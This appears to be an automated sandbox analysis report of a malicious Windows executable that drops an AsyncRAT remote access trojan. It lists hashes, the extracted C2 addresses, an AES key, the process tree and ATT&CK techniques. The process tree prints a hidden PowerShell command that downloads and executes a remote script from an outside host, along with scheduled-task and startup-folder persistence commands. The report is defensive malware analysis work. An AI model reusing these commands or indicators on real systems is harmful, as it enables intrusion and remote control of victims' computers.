Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    18-04-2021 08:01

General

  • Target

    200CB4B34EA0E61FE8454731BF7A107A.exe

  • Size

    1.9MB

  • MD5

    200cb4b34ea0e61fe8454731bf7a107a

  • SHA1

    a6121f8f7d8600c2278e90d5ae622c9b2d3b410b

  • SHA256

    3deec916d94fabdc65168ebd8b5f072a702781064d13b10700d9a52998a669a3

  • SHA512

    62c947626012a18c3a4644ff24909b1c2a3a427b1df4529139eb54bb74da12b5299aca0070d4b0deee168098ea7474207868644e82917bdbf130797f1676fe99

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3

Extracted

Family

asyncrat

Version

0.5.7B

C2

46.1.54.174:87

46.1.54.174:85

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • aes_key

    R77ian3L214LimJgd0qPoT0OH274e11M

  • anti_detection

    false

  • autorun

    false

  • bdos

    false

  • delay

    strings

  • host

    46.1.54.174

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    null

  • port

    87,85

  • version

    0.5.7B

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Vjw0rm

    Vjw0rm is a remote access trojan written in JavaScript.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Drops startup file 5 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 52 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\200CB4B34EA0E61FE8454731BF7A107A.exe
    "C:\Users\Admin\AppData\Local\Temp\200CB4B34EA0E61FE8454731BF7A107A.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1632
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Roaming\DVDFabPlayer5Activator.cmd" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1184
      • C:\Windows\system32\cacls.exe
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        3⤵
          PID:1708
        • C:\Windows\system32\certutil.exe
          certutil -decode "C:\Users\Admin\AppData\Roaming\DVDFab Player 5\regRecord\localuse.tmp" "C:\Users\Admin\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec"
          3⤵
            PID:1964
          • C:\Windows\system32\attrib.exe
            attrib +r "C:\Users\Admin\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec"
            3⤵
            • Views/modifies file attributes
            PID:1020
        • C:\Users\Admin\AppData\Roaming\Ne - Copy.exe
          "C:\Users\Admin\AppData\Roaming\Ne - Copy.exe"
          2⤵
          • Executes dropped EXE
          • Drops startup file
          • Loads dropped DLL
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:1216
          • C:\ProgramData\conhost.exe
            C:\ProgramData/conhost.exe
            3⤵
            • Executes dropped EXE
            • Drops startup file
            • Adds Run key to start application
            • Suspicious use of WriteProcessMemory
            PID:1864
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn Skype /tr "C:\ProgramData\conhost.exe
              4⤵
              • Creates scheduled task(s)
              PID:856
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\winlogon.vbs"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1956
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\winlogon.vbs'))"
            3⤵
            • Drops startup file
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:512
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa
            3⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:936
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Roaming\PDbZT
          2⤵
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:1360
          • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
            "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\PDbZT"
            3⤵
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of SetWindowsHookEx
            PID:1788
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Roaming\mPsDo
          2⤵
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:1572
          • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
            "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\mPsDo"
            3⤵
              PID:880
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {B96083B3-0A15-4200-8C3A-08492A911983} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:1572
          • C:\ProgramData\conhost.exe
            C:\ProgramData\conhost.exe
            2⤵
            • Executes dropped EXE
            • Drops startup file
            • Adds Run key to start application
            • Suspicious use of WriteProcessMemory
            PID:624
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn Skype /tr "C:\ProgramData\conhost.exe
              3⤵
              • Creates scheduled task(s)
              PID:1848

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Execution

        Scheduled Task

        1
        T1053

        Persistence

        Registry Run Keys / Startup Folder

        1
        T1060

        Scheduled Task

        1
        T1053

        Hidden Files and Directories

        1
        T1158

        Privilege Escalation

        Scheduled Task

        1
        T1053

        Defense Evasion

        Modify Registry

        1
        T1112

        Hidden Files and Directories

        1
        T1158

        Discovery

        System Information Discovery

        1
        T1082

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\conhost.exe
          MD5

          fdbd7b1910d980cf7273796a0119d252

          SHA1

          47029af064a51454662909465ce38ee5cdcc62c7

          SHA256

          3e1da2d14de49132c42e8a4ddceb5efd36e066523affcc47de6d175316ab0f4e

          SHA512

          ab43e5ba29134c62a8beb000657f83b9471a64a839d3462c9625d059b5e259a75cdd27b2536150ae40931478384f6c13ef777756391cbe4cd9d95de35b581170

        • C:\ProgramData\conhost.exe
          MD5

          fdbd7b1910d980cf7273796a0119d252

          SHA1

          47029af064a51454662909465ce38ee5cdcc62c7

          SHA256

          3e1da2d14de49132c42e8a4ddceb5efd36e066523affcc47de6d175316ab0f4e

          SHA512

          ab43e5ba29134c62a8beb000657f83b9471a64a839d3462c9625d059b5e259a75cdd27b2536150ae40931478384f6c13ef777756391cbe4cd9d95de35b581170

        • C:\ProgramData\conhost.exe
          MD5

          fdbd7b1910d980cf7273796a0119d252

          SHA1

          47029af064a51454662909465ce38ee5cdcc62c7

          SHA256

          3e1da2d14de49132c42e8a4ddceb5efd36e066523affcc47de6d175316ab0f4e

          SHA512

          ab43e5ba29134c62a8beb000657f83b9471a64a839d3462c9625d059b5e259a75cdd27b2536150ae40931478384f6c13ef777756391cbe4cd9d95de35b581170

        • C:\ProgramData\conhost.exe.manifest
          MD5

          dea3d191f1d0f2a5ba924465a46ed502

          SHA1

          25fa8deddb7f560e849ed60e0433a638c0cca69c

          SHA256

          d628b76063bed997485067b40845ad2f24383d3f2936f94825603748543b1d5f

          SHA512

          db300c40c5891a0b4b9e8dee1abc843ac6507f9972a06505f3ed4198513dc4b06541b544312a5cb540615ac3b5db5d033709cdba962f7f28209989aa3b8bebf7

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          MD5

          ef03bdca84913dfeb5dd7b3dea29072f

          SHA1

          e794f6f29d042f61ed971ce990381f9750ad36b5

          SHA256

          a777f18cc4d4408078e4bbbd8db270d79d0b4bbb17bca3825e097050b8d46fac

          SHA512

          876806ff5e9b454147664259b11e66e73e11e78fe0f8c6576725c9e509ef9667e373b4f035966b271b5c8033e7303d11628840821564bea5b6855f3bcde62daa

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          MD5

          490746ffc62c0ecf590e68913d4e924c

          SHA1

          819e28098e5fb7df9778006f22b245e1b5d907af

          SHA256

          717abff0a6b916c54b462776e7d32e9e38c239e16879a0b666e7ac5ce9a01bd2

          SHA512

          5e60e2e90a84d5231dbc0c2583925deafdab9ed5fe82280f3fbc944d1a0056f712188e4cb579463d440667e9f838884aefe6c35898e8fb8904a5d913e47586a8

        • C:\Users\Admin\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec
          MD5

          bea3f19921218df1ac5ba51ef108de85

          SHA1

          14b7dc87e78647d3e3d4ed2c6eee3011eba93a68

          SHA256

          0f8c6d5f7f0d7bf2b9807b43ab1b3e7a199bc9cb6d9e24768fbd9ffff5119c0c

          SHA512

          4b26d86da6a5f46733386d7d8ad6453cae1605d5a781c9befb26a326542d1bd6d321e05b81dcb1caa2ecd17b436c4d5e315f5d98aa69c377a10d7e72220c7c12

        • C:\Users\Admin\AppData\Roaming\DVDFab Player 5\regRecord\localuse.tmp
          MD5

          bdfca84da5ba5c5cf7248cb6f57d73fc

          SHA1

          3c09e26230b406c200f18278c41afc6bde42eed5

          SHA256

          2952ff5907b110a1ee03dbdd29d50ec69425af025bc6522fedb3bd1fb19ec18a

          SHA512

          6faed5b0ce62bd307d6ee73b1e3f23c41ac49cb2428f3a114d68026baff0a77fb7d5eb7c9b9bc7e49ea9746b5cdc7987e7e18f9b1676495acdd1f32df27841ab

        • C:\Users\Admin\AppData\Roaming\DVDFabPlayer5Activator.cmd
          MD5

          f4bf2bbaee1287264fd210715be2e558

          SHA1

          ea0efcb5fb67278ddc7ab162a1886bd2c88c04b9

          SHA256

          c8be0d55178972ebdcdaf5977193708a00b245c51ba866d1f8944900236862e2

          SHA512

          9b789ad964a54031e396daee9ad6325f196482d69d6f69dc8e1b8535a994118ce3d72c8eb405dc0d3442d42971882152f56ec204d1e4bc4b011d6157fd2995cc

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          MD5

          85e4376909c74a9652421182511c82da

          SHA1

          afbe729b3eb633a8926804dcde749d0f20e4bb9e

          SHA256

          8eb6473f537c4dcb06506e2762587c9cbf068c00c137f5703bca0543e8c89f6a

          SHA512

          c77adca2349117353eb5073d8c06364f63fb82bddae5d4bba6f95d5143fae9ad38afce5693477b5ab2309bf1d2dceab62dc6c36535b1ce5e765cf1c9039fd5e9

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe
          MD5

          fdbd7b1910d980cf7273796a0119d252

          SHA1

          47029af064a51454662909465ce38ee5cdcc62c7

          SHA256

          3e1da2d14de49132c42e8a4ddceb5efd36e066523affcc47de6d175316ab0f4e

          SHA512

          ab43e5ba29134c62a8beb000657f83b9471a64a839d3462c9625d059b5e259a75cdd27b2536150ae40931478384f6c13ef777756391cbe4cd9d95de35b581170

        • C:\Users\Admin\AppData\Roaming\Ne - Copy.exe
          MD5

          a4a1fa7769df7c47a6d69fb66aa1eb30

          SHA1

          bbcec5f1976ce639eacee23aebce966c3debe111

          SHA256

          f08aa6c8b9f5931cfff0e2ecb22c93ea177930d23ec213c1f683ce8467a49cec

          SHA512

          54e0f518c87902f3953fa00d0a4dfae655ad13bc50fb02d5777186e3ab09ba4daad67dd5fe09f6db098e1907e95156c3b27ec08f80bdb3fc2ed0cc11a9f7c84b

        • C:\Users\Admin\AppData\Roaming\PDbZT
          MD5

          d7e5c89164e02323e6f23511de2b9eec

          SHA1

          95ad25d859d304621b9df59a61982e1c7237e6c0

          SHA256

          4e856e249f7cd6d8d3c6056fc225bb4ae888827b99b1e72cd902b2bdd55d3f55

          SHA512

          f40625479f066ee6179a4292ff89b6d6365221628ca395c225caf2d1bb8bac974f55d9f9c33ebb49b47828840d00afefbafb5715f3b35e53c4cf852edec2b816

        • C:\Users\Admin\AppData\Roaming\mPsDo
          MD5

          a82acaf477db7c71a685a546e332265a

          SHA1

          a90b4908bae651f0339b4a851275f9292826a3ef

          SHA256

          38cffec3cd65ac6c27c140b45ab067ec1f8955b61299250b709b5e799db5c30e

          SHA512

          e9cbfc82e28b6a877b09aaa47855ccdfb1556c9f77fb878f085d83b9cd10b00eec20c0c2abf52fc2a8925efc623a7c4e683c393178642a476d51c3de6ebb2c63

        • C:\Users\Admin\AppData\Roaming\winlogon.vbs
          MD5

          95433f3a8de55d26ddf7864fe9cde527

          SHA1

          2f10dd935c890e89abfc16e9d959ca6163fd8bb6

          SHA256

          f63c9b2f961f0242f3d00d453a880df93c944125a57bb82942913a4527e5de49

          SHA512

          32fdd2b102f6a3dfe13a9fcb985b62b195b0eb0815959fc4d9ce3817451da2d0b03ecf4d186409694f0b49842e84207e638fc838c90009d39a1cc822451d4334

        • \ProgramData\conhost.exe
          MD5

          fdbd7b1910d980cf7273796a0119d252

          SHA1

          47029af064a51454662909465ce38ee5cdcc62c7

          SHA256

          3e1da2d14de49132c42e8a4ddceb5efd36e066523affcc47de6d175316ab0f4e

          SHA512

          ab43e5ba29134c62a8beb000657f83b9471a64a839d3462c9625d059b5e259a75cdd27b2536150ae40931478384f6c13ef777756391cbe4cd9d95de35b581170

        • \Users\Admin\AppData\Roaming\Ne - Copy.exe
          MD5

          a4a1fa7769df7c47a6d69fb66aa1eb30

          SHA1

          bbcec5f1976ce639eacee23aebce966c3debe111

          SHA256

          f08aa6c8b9f5931cfff0e2ecb22c93ea177930d23ec213c1f683ce8467a49cec

          SHA512

          54e0f518c87902f3953fa00d0a4dfae655ad13bc50fb02d5777186e3ab09ba4daad67dd5fe09f6db098e1907e95156c3b27ec08f80bdb3fc2ed0cc11a9f7c84b

        • memory/512-104-0x0000000002710000-0x0000000002711000-memory.dmp
          Filesize

          4KB

        • memory/512-93-0x00000000026D0000-0x00000000026D1000-memory.dmp
          Filesize

          4KB

        • memory/512-101-0x000000001AC04000-0x000000001AC06000-memory.dmp
          Filesize

          8KB

        • memory/512-100-0x000000001AC00000-0x000000001AC02000-memory.dmp
          Filesize

          8KB

        • memory/512-98-0x0000000002590000-0x0000000002591000-memory.dmp
          Filesize

          4KB

        • memory/512-84-0x0000000000000000-mapping.dmp
        • memory/512-94-0x000000001AC80000-0x000000001AC81000-memory.dmp
          Filesize

          4KB

        • memory/624-115-0x0000000000000000-mapping.dmp
        • memory/624-120-0x0000000000200000-0x0000000000201000-memory.dmp
          Filesize

          4KB

        • memory/856-86-0x0000000000000000-mapping.dmp
        • memory/880-113-0x0000000000000000-mapping.dmp
        • memory/936-111-0x0000000002800000-0x000000000280C000-memory.dmp
          Filesize

          48KB

        • memory/936-102-0x0000000002400000-0x0000000002402000-memory.dmp
          Filesize

          8KB

        • memory/936-85-0x0000000000000000-mapping.dmp
        • memory/936-109-0x000000001B270000-0x000000001B271000-memory.dmp
          Filesize

          4KB

        • memory/936-103-0x0000000002404000-0x0000000002406000-memory.dmp
          Filesize

          8KB

        • memory/1020-90-0x0000000000000000-mapping.dmp
        • memory/1184-62-0x0000000000000000-mapping.dmp
        • memory/1216-66-0x000007FEFC031000-0x000007FEFC033000-memory.dmp
          Filesize

          8KB

        • memory/1216-64-0x0000000000000000-mapping.dmp
        • memory/1360-77-0x0000000000000000-mapping.dmp
        • memory/1572-83-0x0000000000000000-mapping.dmp
        • memory/1632-79-0x000000001ADE0000-0x000000001ADE2000-memory.dmp
          Filesize

          8KB

        • memory/1632-60-0x0000000000890000-0x0000000000891000-memory.dmp
          Filesize

          4KB

        • memory/1708-69-0x0000000000000000-mapping.dmp
        • memory/1788-107-0x0000000000000000-mapping.dmp
        • memory/1788-108-0x0000000075551000-0x0000000075553000-memory.dmp
          Filesize

          8KB

        • memory/1848-119-0x0000000000000000-mapping.dmp
        • memory/1864-80-0x0000000000200000-0x0000000000201000-memory.dmp
          Filesize

          4KB

        • memory/1864-71-0x0000000000000000-mapping.dmp
        • memory/1956-67-0x0000000000000000-mapping.dmp
        • memory/1964-72-0x0000000000000000-mapping.dmp
        • memory/1964-78-0x00000000FFC41000-0x00000000FFC43000-memory.dmp
          Filesize

          8KB